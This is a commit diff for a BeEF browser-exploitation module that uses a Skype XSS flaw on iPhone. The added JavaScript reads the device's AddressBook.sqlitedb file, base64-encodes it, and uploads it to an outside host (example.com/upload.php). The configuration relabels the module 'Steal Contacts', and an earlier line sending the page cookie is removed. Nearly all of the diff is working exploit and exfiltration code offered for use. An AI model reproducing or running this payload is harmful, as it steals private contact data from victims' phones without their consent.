Adding the JS code of the Skype XSS exploit

modules/exploits/skype_xss/command.js

@@ -15,7 +15,32 @@
 //
 beef.execute(function() {
 
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie);
+	x = new XMLHttpRequest;
+	x.open("get","file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb");
+	x.overrideMimeType("text/plain; charset=x-user-defined");
+	x.send();
+		
+	x.onreadystatechange = function() {
+		if(x.readyState == 4){
+			a = x.responseText || "";
+			ff=[];
+			mx=a.length;
+			scc = String.fromCharCode;
+		}		
+		for(var z = 0 ; z < mx ; z++){
+			ff[z] = scc(a.charCodeAt(z)&255);
+		}
+		
+		b=ff.join("");
+		b=btoa(b);
+		xp = new XMLHttpRequest;
+		xp.open("post","http://example.com/upload.php",!0);
+		xp.setRequestHeader("Content-Type","multipart/form-data;boundary=xxx,");
+		a = "--xxx\r\nContent-Disposition:form-data;name=\"media\";filename=\"ios.sqlitedb\"\r\nContent-Type:application/octet-stream\r\n\r\n"+b+"\r\n--xxx--";
+		xp.send(a);
+	};
+	
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'SQL file sent');
 
 });
 

modules/exploits/skype_xss/config.yaml

@@ -18,8 +18,8 @@ beef:
         skype_xss:
             enable: true
             category: "Exploits"
-            name: "Skykpe iPhone XSS"
-            description: "This module will retrieve the session cookie from the current page."
+            name: "Skykpe iPhone XSS Steal Contacts"
+            description: "This module will steal iPhone contacts using a Skype XSS vuln."
             authors: ["saafan"]
             target:
                 working: ["ALL"]

modules/exploits/skype_xss/module.rb

@@ -20,9 +20,7 @@ class Get_cookie < BeEF::Core::Command
 	##Stub##
 	
 	
-    content = {}
-    content['cookie'] = @datastore['cookie']
-    save content
+    save({'result' => @datastore['result']})
   end
 
 end